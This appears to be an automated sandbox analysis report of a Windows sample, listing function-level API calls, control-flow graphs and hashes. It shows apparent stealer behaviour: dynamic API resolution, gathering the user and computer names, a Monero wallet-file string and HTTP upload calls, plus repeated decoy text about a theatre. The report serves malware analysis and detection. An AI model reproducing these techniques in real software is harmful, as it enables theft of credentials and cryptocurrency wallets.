                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00924713
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0092471E
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00924638
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009245DD
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0092474F
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00924734
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00924617
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateHeapProtectVirtual
                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                  • API String ID: 1542196881-2218711628
                  • Opcode ID: 5b2a113903bf862b07eb7057bf0814963b68615684a9440ca80d4e7e3b9f614b
                  • Instruction ID: ee79abb0b0be138a5c0fd538c639270dba3a94191422892524fa7f83b886e76b
                  • Opcode Fuzzy Hash: 5b2a113903bf862b07eb7057bf0814963b68615684a9440ca80d4e7e3b9f614b
                  • Instruction Fuzzy Hash: 994136607D6E047BC638BBE5A86EEFF77565FD6B08F815040A8485228BCAF0A50C453A
                  Function 00924880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 801 924880-924942 call 93a7a0 call 9247b0 call 93a740 * 5 InternetOpenA StrCmpCA 816 924944 801->816 817 92494b-92494f 801->817 816->817 818 924955-924acd call 938b60 call 93a920 call 93a8a0 call 93a800 * 2 call 93a9b0 call 93a8a0 call 93a800 call 93a9b0 call 93a8a0 call 93a800 call 93a920 call 93a8a0 call 93a800 call 93a9b0 call 93a8a0 call 93a800 call 93a9b0 call 93a8a0 call 93a800 call 93a9b0 call 93a920 call 93a8a0 call 93a800 * 2 InternetConnectA 817->818 819 924ecb-924ef3 InternetCloseHandle call 93aad0 call 929ac0 817->819 818->819 905 924ad3-924ad7 818->905 829 924f32-924fa2 call 938990 * 2 call 93a7a0 call 93a800 * 8 819->829 830 924ef5-924f2d call 93a820 call 93a9b0 call 93a8a0 call 93a800 819->830 830->829 906 924ae5 905->906 907 924ad9-924ae3 905->907 908 924aef-924b22 HttpOpenRequestA 906->908 907->908 909 924b28-924e28 call 93a9b0 call 93a8a0 call 93a800 call 93a920 call 93a8a0 call 93a800 call 93a9b0 call 93a8a0 call 93a800 call 93a9b0 call 93a8a0 call 93a800 call 93a9b0 call 93a8a0 call 93a800 call 93a9b0 call 93a8a0 call 93a800 call 93a920 call 93a8a0 call 93a800 call 93a9b0 call 93a8a0 call 93a800 call 93a9b0 call 93a8a0 call 93a800 call 93a920 call 93a8a0 call 93a800 call 93a9b0 call 93a8a0 call 93a800 call 93a9b0 call 93a8a0 call 93a800 call 93a9b0 call 93a8a0 call 93a800 call 93a9b0 call 93a8a0 call 93a800 call 93a920 call 93a8a0 call 93a800 call 93a740 call 93a920 * 2 call 93a8a0 call 93a800 * 2 call 93aad0 lstrlen call 93aad0 * 2 lstrlen call 93aad0 HttpSendRequestA 908->909 910 924ebe-924ec5 InternetCloseHandle 908->910 1021 924e32-924e5c InternetReadFile 909->1021 910->819 1022 924e67-924eb9 InternetCloseHandle call 93a800 1021->1022 1023 924e5e-924e65 1021->1023 1022->910 1023->1022 1024 924e69-924ea7 call 93a9b0 call 93a8a0 call 93a800 1023->1024 1024->1021
                  APIs
                    • Part of subcall function 0093A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0093A7E6
                    • Part of subcall function 009247B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00924839
                    • Part of subcall function 009247B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00924849
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00924915
                  • StrCmpCA.SHLWAPI(?,0105E790), ref: 0092493A
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00924ABA
                  • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00940DDB,00000000,?,?,00000000,?,",00000000,?,0105E6F0), ref: 00924DE8
                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00924E04
                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00924E18
                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00924E49
                  • InternetCloseHandle.WININET(00000000), ref: 00924EAD
                  • InternetCloseHandle.WININET(00000000), ref: 00924EC5
                  • HttpOpenRequestA.WININET(00000000,0105E810,?,0105EAD0,00000000,00000000,00400100,00000000), ref: 00924B15
                    • Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,01059110,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
                    • Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
                    • Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12
                    • Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905
                    • Part of subcall function 0093A920: lstrcpy.KERNEL32(00000000,?), ref: 0093A972
                    • Part of subcall function 0093A920: lstrcat.KERNEL32(00000000), ref: 0093A982
                  • InternetCloseHandle.WININET(00000000), ref: 00924ECF
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                  • String ID: "$"$------$------$------
                  • API String ID: 460715078-2180234286
                  • Opcode ID: 6d6aacd2f10cae9fbb8547c42782ee08ee2ed4ebf0d1b2cf5d8f456fdeaafc6b
                  • Instruction ID: 14216f5fec0592fda5fc82cd9adbccf16451b028803429423abdf16804e6c8c9
                  • Opcode Fuzzy Hash: 6d6aacd2f10cae9fbb8547c42782ee08ee2ed4ebf0d1b2cf5d8f456fdeaafc6b
                  • Instruction Fuzzy Hash: AC12B972910218AADB15EB90DC92FEEB779AF94300F504199F14673091EF742F49CF66
                  Function 009378E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00937910
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00937917
                  • GetComputerNameA.KERNEL32(?,00000104), ref: 0093792F
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateComputerNameProcess
                  • String ID:
                  • API String ID: 1664310425-0
                  • Opcode ID: 4e9b404d21d6c6e0828150971511fc7249e9c75061fdbcd78e72ab75a5e9a5c9
                  • Instruction ID: a4df44b8b3d3da729f416243b986f2d38fdad256dc7aad56b3c0e6ff855b81d1
                  • Opcode Fuzzy Hash: 4e9b404d21d6c6e0828150971511fc7249e9c75061fdbcd78e72ab75a5e9a5c9
                  • Instruction Fuzzy Hash: 690186B1904204EBDB10DF94DD45BAAFBBCF744B21F104219FA45E72C0D77859008FA2
                  Function 00937850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009211B7), ref: 00937880
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00937887
                  • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0093789F
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateNameProcessUser
                  • String ID:
                  • API String ID: 1296208442-0
                  • Opcode ID: 53ddb4522fdc10bd1f4e55446efe80fc84b697ab0437666c15619c5486fee251
                  • Instruction ID: 6bbffc2f01b3df1dbd291c50d3f186b7fd2d4c9289f413cfc5c70929106b5750
                  • Opcode Fuzzy Hash: 53ddb4522fdc10bd1f4e55446efe80fc84b697ab0437666c15619c5486fee251
                  • Instruction Fuzzy Hash: C8F04FB1944209ABCB10DF98DD49BAEFBB8EB48711F10065AFA05A36C0C7B819048FA1
                  Function 00921160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitInfoProcessSystem
                  • String ID:
                  • API String ID: 752954902-0
                  • Opcode ID: 3b104418ed23a88f278c9190885dae5ada6a942efacc219e696f91324f4d00fb
                  • Instruction ID: c73e2804039228ea8ea2ae4b294924a127fd9cfc15b0f3ba4c4ae5a40ff9081a
                  • Opcode Fuzzy Hash: 3b104418ed23a88f278c9190885dae5ada6a942efacc219e696f91324f4d00fb
                  • Instruction Fuzzy Hash: CCD017749042089BCB009BA0984A6ADBB78EB08211F000555D90572280EA70A8918AA6
                  Function 00939C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 633 939c10-939c1a 634 939c20-93a031 GetProcAddress * 43 633->634 635 93a036-93a0ca LoadLibraryA * 8 633->635 634->635 636 93a146-93a14d 635->636 637 93a0cc-93a141 GetProcAddress * 5 635->637 638 93a153-93a211 GetProcAddress * 8 636->638 639 93a216-93a21d 636->639 637->636 638->639 640 93a298-93a29f 639->640 641 93a21f-93a293 GetProcAddress * 5 639->641 642 93a337-93a33e 640->642 643 93a2a5-93a332 GetProcAddress * 6 640->643 641->640 644 93a344-93a41a GetProcAddress * 9 642->644 645 93a41f-93a426 642->645 643->642 644->645 646 93a4a2-93a4a9 645->646 647 93a428-93a49d GetProcAddress * 5 645->647 648 93a4ab-93a4d7 GetProcAddress * 2 646->648 649 93a4dc-93a4e3 646->649 647->646 648->649 650 93a515-93a51c 649->650 651 93a4e5-93a510 GetProcAddress * 2 649->651 652 93a612-93a619 650->652 653 93a522-93a60d GetProcAddress * 10 650->653 651->650 654 93a61b-93a678 GetProcAddress * 4 652->654 655 93a67d-93a684 652->655 653->652 654->655 656 93a686-93a699 GetProcAddress 655->656 657 93a69e-93a6a5 655->657 656->657 658 93a6a7-93a703 GetProcAddress * 4 657->658 659 93a708-93a709 657->659 658->659
                  APIs
                  • GetProcAddress.KERNEL32(76F70000,01046300), ref: 00939C2D
                  • GetProcAddress.KERNEL32(76F70000,010464C0), ref: 00939C45
                  • GetProcAddress.KERNEL32(76F70000,01059950), ref: 00939C5E
                  • GetProcAddress.KERNEL32(76F70000,010598F0), ref: 00939C76
                  • GetProcAddress.KERNEL32(76F70000,010598A8), ref: 00939C8E
                  • GetProcAddress.KERNEL32(76F70000,01059920), ref: 00939CA7
                  • GetProcAddress.KERNEL32(76F70000,0104B4B8), ref: 00939CBF
                  • GetProcAddress.KERNEL32(76F70000,010598C0), ref: 00939CD7
                  • GetProcAddress.KERNEL32(76F70000,01059908), ref: 00939CF0
                  • GetProcAddress.KERNEL32(76F70000,01059848), ref: 00939D08
                  • GetProcAddress.KERNEL32(76F70000,01059890), ref: 00939D20
                  • GetProcAddress.KERNEL32(76F70000,01046240), ref: 00939D39
                  • GetProcAddress.KERNEL32(76F70000,010462C0), ref: 00939D51
                  • GetProcAddress.KERNEL32(76F70000,01046560), ref: 00939D69
                  • GetProcAddress.KERNEL32(76F70000,01046580), ref: 00939D82
                  • GetProcAddress.KERNEL32(76F70000,010599F8), ref: 00939D9A
                  • GetProcAddress.KERNEL32(76F70000,01059860), ref: 00939DB2
                  • GetProcAddress.KERNEL32(76F70000,0104ADB0), ref: 00939DCB
                  • GetProcAddress.KERNEL32(76F70000,010462A0), ref: 00939DE3
                  • GetProcAddress.KERNEL32(76F70000,01059CA8), ref: 00939DFB
                  • GetProcAddress.KERNEL32(76F70000,01059DE0), ref: 00939E14
                  • GetProcAddress.KERNEL32(76F70000,01059E10), ref: 00939E2C
                  • GetProcAddress.KERNEL32(76F70000,01059C90), ref: 00939E44
                  • GetProcAddress.KERNEL32(76F70000,010462E0), ref: 00939E5D
                  • GetProcAddress.KERNEL32(76F70000,01059CC0), ref: 00939E75
                  • GetProcAddress.KERNEL32(76F70000,01059CD8), ref: 00939E8D
                  • GetProcAddress.KERNEL32(76F70000,01059CF0), ref: 00939EA6
                  • GetProcAddress.KERNEL32(76F70000,01059DB0), ref: 00939EBE
                  • GetProcAddress.KERNEL32(76F70000,01059D20), ref: 00939ED6
                  • GetProcAddress.KERNEL32(76F70000,01059D08), ref: 00939EEF
                  • GetProcAddress.KERNEL32(76F70000,01059D38), ref: 00939F07
                  • GetProcAddress.KERNEL32(76F70000,01059D50), ref: 00939F1F
                  • GetProcAddress.KERNEL32(76F70000,01059D68), ref: 00939F38
                  • GetProcAddress.KERNEL32(76F70000,0105C870), ref: 00939F50
                  • GetProcAddress.KERNEL32(76F70000,01059D80), ref: 00939F68
                  • GetProcAddress.KERNEL32(76F70000,01059D98), ref: 00939F81
                  • GetProcAddress.KERNEL32(76F70000,010461C0), ref: 00939F99
                  • GetProcAddress.KERNEL32(76F70000,01059DC8), ref: 00939FB1
                  • GetProcAddress.KERNEL32(76F70000,01046340), ref: 00939FCA
                  • GetProcAddress.KERNEL32(76F70000,01059DF8), ref: 00939FE2
                  • GetProcAddress.KERNEL32(76F70000,01059E28), ref: 00939FFA
                  • GetProcAddress.KERNEL32(76F70000,01046200), ref: 0093A013
                  • GetProcAddress.KERNEL32(76F70000,01046220), ref: 0093A02B
                  • LoadLibraryA.KERNEL32(01059E40,?,00935CA3,00940AEB,?,?,?,?,?,?,?,?,?,?,00940AEA,00940AE3), ref: 0093A03D
                  • LoadLibraryA.KERNEL32(01059C78,?,00935CA3,00940AEB,?,?,?,?,?,?,?,?,?,?,00940AEA,00940AE3), ref: 0093A04E
                  • LoadLibraryA.KERNEL32(0105D248,?,00935CA3,00940AEB,?,?,?,?,?,?,?,?,?,?,00940AEA,00940AE3), ref: 0093A060
                  • LoadLibraryA.KERNEL32(0105D290,?,00935CA3,00940AEB,?,?,?,?,?,?,?,?,?,?,00940AEA,00940AE3), ref: 0093A072
                  • LoadLibraryA.KERNEL32(0105D200,?,00935CA3,00940AEB,?,?,?,?,?,?,?,?,?,?,00940AEA,00940AE3), ref: 0093A083
                  • LoadLibraryA.KERNEL32(0105D1E8,?,00935CA3,00940AEB,?,?,?,?,?,?,?,?,?,?,00940AEA,00940AE3), ref: 0093A095
                  • LoadLibraryA.KERNEL32(0105D158,?,00935CA3,00940AEB,?,?,?,?,?,?,?,?,?,?,00940AEA,00940AE3), ref: 0093A0A7
                  • LoadLibraryA.KERNEL32(0105D2C0,?,00935CA3,00940AEB,?,?,?,?,?,?,?,?,?,?,00940AEA,00940AE3), ref: 0093A0B8
                  • GetProcAddress.KERNEL32(75840000,01046800), ref: 0093A0DA
                  • GetProcAddress.KERNEL32(75840000,0105D2D8), ref: 0093A0F2
                  • GetProcAddress.KERNEL32(75840000,01058E50), ref: 0093A10A
                  • GetProcAddress.KERNEL32(75840000,0105D1B8), ref: 0093A123
                  • GetProcAddress.KERNEL32(75840000,01046820), ref: 0093A13B
                  • GetProcAddress.KERNEL32(73B90000,0104B210), ref: 0093A160
                  • GetProcAddress.KERNEL32(73B90000,01046920), ref: 0093A179
                  • GetProcAddress.KERNEL32(73B90000,0104B030), ref: 0093A191
                  • GetProcAddress.KERNEL32(73B90000,0105D1D0), ref: 0093A1A9
                  • GetProcAddress.KERNEL32(73B90000,0105D2F0), ref: 0093A1C2
                  • GetProcAddress.KERNEL32(73B90000,01046680), ref: 0093A1DA
                  • GetProcAddress.KERNEL32(73B90000,01046720), ref: 0093A1F2
                  • GetProcAddress.KERNEL32(73B90000,0105D140), ref: 0093A20B
                  • GetProcAddress.KERNEL32(760B0000,010466A0), ref: 0093A22C
                  • GetProcAddress.KERNEL32(760B0000,010465C0), ref: 0093A244
                  • GetProcAddress.KERNEL32(760B0000,0105D218), ref: 0093A25D
                  • GetProcAddress.KERNEL32(760B0000,0105D170), ref: 0093A275
                  • GetProcAddress.KERNEL32(760B0000,01046640), ref: 0093A28D
                  • GetProcAddress.KERNEL32(75D30000,0104B0F8), ref: 0093A2B3
                  • GetProcAddress.KERNEL32(75D30000,0104B198), ref: 0093A2CB
                  • GetProcAddress.KERNEL32(75D30000,0105D188), ref: 0093A2E3
                  • GetProcAddress.KERNEL32(75D30000,010466C0), ref: 0093A2FC
                  • GetProcAddress.KERNEL32(75D30000,01046620), ref: 0093A314
                  • GetProcAddress.KERNEL32(75D30000,0104AF40), ref: 0093A32C
                  • GetProcAddress.KERNEL32(753A0000,0105D2A8), ref: 0093A352
                  • GetProcAddress.KERNEL32(753A0000,010466E0), ref: 0093A36A
                  • GetProcAddress.KERNEL32(753A0000,01058EB0), ref: 0093A382
                  • GetProcAddress.KERNEL32(753A0000,0105D260), ref: 0093A39B
                  • GetProcAddress.KERNEL32(753A0000,0105D308), ref: 0093A3B3
